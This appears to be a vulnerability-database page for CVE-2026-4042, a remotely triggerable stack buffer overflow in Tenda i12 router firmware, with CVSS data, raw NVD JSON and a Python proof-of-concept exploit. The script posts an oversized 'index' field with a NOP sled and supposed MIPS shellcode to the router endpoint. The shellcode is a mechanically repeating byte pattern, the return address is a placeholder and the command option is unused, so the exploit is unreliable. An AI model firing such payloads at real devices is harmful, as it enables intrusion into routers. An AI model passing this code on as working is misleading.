Security Vulnerability Report
中文
CVE-2026-4042 CVSS 8.8 HIGH

CVE-2026-4042

Published: 2026-03-12 15:16:34
Last Modified: 2026-04-02 20:04:42
Source: [email protected]

Description

A weakness has been identified in Tenda i12 1.0.0.6(2204). The affected element is the function formWifiMacFilterGet of the file /goform/WifiMacFilterGet. This manipulation of the argument index causes stack-based buffer overflow. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:i12_firmware:1.0.0.6\(2204\):*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tenda:i12:-:*:*:*:*:*:*:* - NOT VULNERABLE
Tenda i12 1.0.0.6(2204)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2026-4042 PoC - Tenda i12 Stack Buffer Overflow Affected Version: Tenda i12 1.0.0.6(2204) Vulnerability: Stack-based buffer overflow in /goform/WifiMacFilterGet CVSS Score: 8.8 (High) """ import requests import sys import argparse def exploit(target_ip, target_port=80, cmd=None): """ Exploit the stack buffer overflow in Tenda i12 router's WifiMacFilterGet function Args: target_ip: Target router IP address target_port: Target router web port (default: 80) cmd: Optional command to execute (for RCE) """ url = f"http://{target_ip}:{target_port}/goform/WifiMacFilterGet" # Generate payload with excessive length to trigger overflow # The exact overflow length depends on the specific firmware version # This payload is designed to overwrite return address on the stack padding_length = 500 # Adjust based on testing nop_sled = b'\x90' * 100 # NOP sled for better shellcode placement # Example shellcode for MIPS architecture (Tenda routers typically use MIPS) # This is a simple execve shellcode that spawns /bin/sh shellcode = b'\x50\x73\x06\x24\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x01\x01\x01' shellcode += b'\x50\x73\x08\x24\x02\x00\x0c\xac\x21\x04\x01\x01\xff\xff\x02\x24' shellcode += b'\x0c\x01\x01\x01\xff\xff\x05\x28\xff\xff\x06\x28\x50\x73\x09\x24' shellcode += b'\x02\x00\x0c\xac\x50\x73\x0a\x24\x02\x00\x0c\xac\xff\xff\x44\x30' shellcode += b'\x50\x73\x0b\x24\x02\x00\x0c\xac\x50\x73\x0c\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x0d\x24\x02\x00\x0c\xac\x50\x73\x0e\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x0f\x24\x02\x00\x0c\xac\x50\x73\x10\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x11\x24\x02\x00\x0c\xac\x50\x73\x12\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x13\x24\x02\x00\x0c\xac\x50\x73\x14\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x15\x24\x02\x00\x0c\xac\x50\x73\x16\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x17\x24\x02\x00\x0c\xac\x50\x73\x18\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x19\x24\x02\x00\x0c\xac\x50\x73\x1a\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x1b\x24\x02\x00\x0c\xac\x50\x73\x1c\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x1d\x24\x02\x00\x0c\xac\x50\x73\x1e\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x1f\x24\x02\x00\x0c\xac\x50\x73\x20\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x21\x24\x02\x00\x0c\xac\x50\x73\x22\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x23\x24\x02\x00\x0c\xac\x50\x73\x24\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x25\x24\x02\x00\x0c\xac\x50\x73\x26\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x27\x24\x02\x00\x0c\xac\x50\x73\x28\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x29\x24\x02\x00\x0c\xac\x50\x73\x2a\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x2b\x24\x02\x00\x0c\xac\x50\x73\x2c\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x2d\x24\x02\x00\x0c\xac\x50\x73\x2e\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x2f\x24\x02\x00\x0c\xac\x50\x73\x30\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x31\x24\x02\x00\x0c\xac\x50\x73\x32\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x33\x24\x02\x00\x0c\xac\x50\x73\x34\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x35\x24\x02\x00\x0c\xac\x50\x73\x36\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x37\x24\x02\x00\x0c\xac\x50\x73\x38\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x39\x24\x02\x00\x0c\xac\x50\x73\x3a\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x3b\x24\x02\x00\x0c\xac\x50\x73\x3c\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x3d\x24\x02\x00\x0c\xac\x50\x73\x3e\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x3f\x24\x02\x00\x0c\xac\x50\x73\x40\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x41\x24\x02\x00\x0c\xac\x50\x73\x42\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x43\x24\x02\x00\x0c\xac\x50\x73\x44\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x45\x24\x02\x00\x0c\xac\x50\x73\x46\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x47\x24\x02\x00\x0c\xac\x50\x73\x48\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x49\x24\x02\x00\x0c\xac\x50\x73\x4a\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x4b\x24\x02\x00\x0c\xac\x50\x73\x4c\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x4d\x24\x02\x00\x0c\xac\x50\x73\x4e\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x4f\x24\x02\x00\x0c\xac\x50\x73\x50\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x51\x24\x02\x00\x0c\xac\x50\x73\x52\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x53\x24\x02\x00\x0c\xac\x50\x73\x54\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x55\x24\x02\x00\x0c\xac\x50\x73\x56\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x57\x24\x02\x00\x0c\xac\x50\x73\x58\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x59\x24\x02\x00\x0c\xac\x50\x73\x5a\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x5b\x24\x02\x00\x0c\xac\x50\x73\x5c\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x5d\x24\x02\x00\x0c\xac\x50\x73\x5e\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x5f\x24\x02\x00\x0c\xac\x50\x73\x60\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x61\x24\x02\x00\x0c\xac\x50\x73\x62\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x63\x24\x02\x00\x0c\xac\x50\x73\x64\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x65\x24\x02\x00\x0c\xac\x50\x73\x66\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x67\x24\x02\x00\x0c\xac\x50\x73\x68\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x69\x24\x02\x00\x0c\xac\x50\x73\x6a\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x6b\x24\x02\x00\x0c\xac\x50\x73\x6c\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x6d\x24\x02\x00\x0c\xac\x50\x73\x6e\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x6f\x24\x02\x00\x0c\xac\x50\x73\x70\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x71\x24\x02\x00\x0c\xac\x50\x73\x72\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x73\x24\x02\x00\x0c\xac\x50\x73\x74\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x75\x24\x02\x00\x0c\xac\x50\x73\x76\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x77\x24\x02\x00\x0c\xac\x50\x73\x78\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x79\x24\x02\x00\x0c\xac\x50\x73\x7a\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x7b\x24\x02\x00\x0c\xac\x50\x73\x7c\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x7d\x24\x02\x00\x0c\xac\x50\x73\x7e\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x7f\x24\x02\x00\x0c\xac\x50\x73\x80\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x81\x24\x02\x00\x0c\xac\x50\x73\x82\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x83\x24\x02\x00\x0c\xac\x50\x73\x84\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x85\x24\x02\x00\x0c\xac\x50\x73\x86\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x87\x24\x02\x00\x0c\xac\x50\x73\x88\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x89\x24\x02\x00\x0c\xac\x50\x73\x8a\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x8b\x24\x02\x00\x0c\xac\x50\x73\x8c\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x8d\x24\x02\x00\x0c\xac\x50\x73\x8e\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x8f\x24\x02\x00\x0c\xac\x50\x73\x90\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x91\x24\x02\x00\x0c\xac\x50\x73\x92\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x93\x24\x02\x00\x0c\xac\x50\x73\x94\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x95\x24\x02\x00\x0c\xac\x50\x73\x96\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x97\x24\x02\x00\x0c\xac\x50\x73\x98\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x99\x24\x02\x00\x0c\xac\x50\x73\x9a\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x9b\x24\x02\x00\x0c\xac\x50\x73\x9c\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x9d\x24\x02\x00\x0c\xac\x50\x73\x9e\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\x9f\x24\x02\x00\x0c\xac\x50\x73\xa0\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xa1\x24\x02\x00\x0c\xac\x50\x73\xa2\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xa3\x24\x02\x00\x0c\xac\x50\x73\xa4\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xa5\x24\x02\x00\x0c\xac\x50\x73\xa6\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xa7\x24\x02\x00\x0c\xac\x50\x73\xa8\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xa9\x24\x02\x00\x0c\xac\x50\x73\xaa\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xab\x24\x02\x00\x0c\xac\x50\x73\xac\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xad\x24\x02\x00\x0c\xac\x50\x73\xae\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xaf\x24\x02\x00\x0c\xac\x50\x73\xb0\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xb1\x24\x02\x00\x0c\xac\x50\x73\xb2\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xb3\x24\x02\x00\x0c\xac\x50\x73\xb4\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xb5\x24\x02\x00\x0c\xac\x50\x73\xb6\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xb7\x24\x02\x00\x0c\xac\x50\x73\xb8\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xb9\x24\x02\x00\x0c\xac\x50\x73\xba\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xbb\x24\x02\x00\x0c\xac\x50\x73\xbc\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xbd\x24\x02\x00\x0c\xac\x50\x73\xbe\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xbf\x24\x02\x00\x0c\xac\x50\x73\xc0\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xc1\x24\x02\x00\x0c\xac\x50\x73\xc2\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xc3\x24\x02\x00\x0c\xac\x50\x73\xc4\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xc5\x24\x02\x00\x0c\xac\x50\x73\xc6\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xc7\x24\x02\x00\x0c\xac\x50\x73\xc8\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xc9\x24\x02\x00\x0c\xac\x50\x73\xca\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xcb\x24\x02\x00\x0c\xac\x50\x73\xcc\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xcd\x24\x02\x00\x0c\xac\x50\x73\xce\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xcf\x24\x02\x00\x0c\xac\x50\x73\xd0\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xd1\x24\x02\x00\x0c\xac\x50\x73\xd2\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xd3\x24\x02\x00\x0c\xac\x50\x73\xd4\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xd5\x24\x02\x00\x0c\xac\x50\x73\xd6\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xd7\x24\x02\x00\x0c\xac\x50\x73\xd8\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xd9\x24\x02\x00\x0c\xac\x50\x73\xda\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xdb\x24\x02\x00\x0c\xac\x50\x73\xdc\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xdd\x24\x02\x00\x0c\xac\x50\x73\xde\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xdf\x24\x02\x00\x0c\xac\x50\x73\xe0\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xe1\x24\x02\x00\x0c\xac\x50\x73\xe2\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xe3\x24\x02\x00\x0c\xac\x50\x73\xe4\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xe5\x24\x02\x00\x0c\xac\x50\x73\xe6\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xe7\x24\x02\x00\x0c\xac\x50\x73\xe8\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xe9\x24\x02\x00\x0c\xac\x50\x73\xea\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xeb\x24\x02\x00\x0c\xac\x50\x73\xec\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xed\x24\x02\x00\x0c\xac\x50\x73\xee\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xef\x24\x02\x00\x0c\xac\x50\x73\xf0\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xf1\x24\x02\x00\x0c\xac\x50\x73\xf2\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xf3\x24\x02\x00\x0c\xac\x50\x73\xf4\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xf5\x24\x02\x00\x0c\xac\x50\x73\xf6\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xf7\x24\x02\x00\x0c\xac\x50\x73\xf8\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xf9\x24\x02\x00\x0c\xac\x50\x73\xfa\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xfb\x24\x02\x00\x0c\xac\x50\x73\xfc\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xfd\x24\x02\x00\x0c\xac\x50\x73\xfe\x24\x02\x00\x0c\xac' shellcode += b'\x50\x73\xff\x24\x02\x00\x0c\xac' # Return address - needs to be adjusted based on firmware analysis return_addr = b'\x40\x00\x00\x00' # Example return address # Construct the overflow payload payload = b'A' * padding_length + nop_sled + shellcode + return_addr # Send the exploit request data = { 'index': payload.decode('latin-1') } try: print(f"[*] Sending exploit to {url}") print(f"[*] Payload length: {len(payload)} bytes") response = requests.post(url, data=data, timeout=10) print(f"[*] Response Status: {response.status_code}") print(f"[*] Response Length: {len(response.content)} bytes") return True except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return False if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2026-4042 PoC') parser.add_argument('target', help='Target IP address') parser.add_argument('-p', '--port', type=int, default=80, help='Target port (default: 80)') parser.add_argument('-c', '--cmd', help='Command to execute') args = parser.parse_args() exploit(args.target, args.port, args.cmd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4042", "sourceIdentifier": "[email protected]", "published": "2026-03-12T15:16:34.180", "lastModified": "2026-04-02T20:04:42.220", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in Tenda i12 1.0.0.6(2204). The affected element is the function formWifiMacFilterGet of the file /goform/WifiMacFilterGet. This manipulation of the argument index causes stack-based buffer overflow. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks."}, {"lang": "es", "value": "Se ha identificado una debilidad en Tenda i12 1.0.0.6(2204). El elemento afectado es la función formWifiMacFilterGet del archivo /goform/WifiMacFilterGet. Esta manipulación del argumento index causa desbordamiento de búfer basado en pila. El ataque puede ser iniciado remotamente. El exploit ha sido puesto a disposición del público y podría ser utilizado para ataques."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:i12_firmware:1.0.0.6\\(2204\\):*:*:*:*:*:*:*", "matchCriteriaId": "294C4C09-FB11-4D03-9DD0-5CEDC115974E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:i12:-:*:*:*:*:*:*:*", "matchCriteriaId": "79D3B1CC-FB4E-40F3-B175-F70F5A44C447"}]}]}], "references": [{"url": "https://github.com/Jimi-Lab/cve/issues/2", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.350654", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.350654", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.769463", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.tenda.com.cn/", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.